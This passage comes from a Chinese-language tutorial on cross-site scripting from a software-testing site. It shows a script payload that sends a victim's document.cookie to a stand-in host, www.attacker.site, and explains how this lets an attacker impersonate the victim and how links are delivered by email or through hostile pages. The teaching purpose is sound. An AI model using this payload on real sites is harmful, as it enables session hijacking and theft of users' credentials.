("http://www.attacker.site/collect
.cgi?cookie="%2Bdocument.cookie)</script>
响应页面看起来像这样: <HTML> <Title>Welcome!</Title> Hi
<script>window.open("http://www.attacker.site/collect.cgi?cookie=
"+document.cookie)</script>
<BR>
Welcome to our system ... </HTML>
加载该页面的浏览器会立即执行内嵌的JavaScript,并向www.attacker.site中的collect.cgi脚本发送请求,并附带着浏览器已经拥有的www.vulnerable.site的cookies的值。这样就泄漏了客户端所拥有的www.vulnerable.site的cookies。这将允许黑客冒充受害者。客户的隐私就完全被破坏了。 注意: 引发JavaScript弹出窗口的出现通常足够说明该站点容易受到XSS攻击。如果可以调用JavaScriptlert方法,那么通常没理由window.open调用不成功。这就是为什么大部分XSS攻击的实例使用alert方法,因为这很容易检测其成功。 范围和可行性 攻击只会在受害者用于访问站点(www.vulnerable.site)的同一个浏览器中发生。黑客需要强迫客户端访问恶意链接。这会以以下这些方式进行: ● 黑客发送包含强迫浏览器访问该链接的HTML页面的电子邮件消息。这要求受害者使用HTML有效的电子邮件客户端,并且客户端的HTML阅读器是用于访问www.vulnerable.site的同一个浏览器。 ● 客户端访问可能受黑客运作的站点,其中的图片链接或其他激活的HTML强迫浏览器访问该链接。再次声明,必须要求浏览器与访问该站点和www.vulnerable.site的是同一个浏览器。 恶意的JavaScript可以访问任何下列信息:
延伸阅读
文章来源于领测软件测试网 https://www.ltesting.net/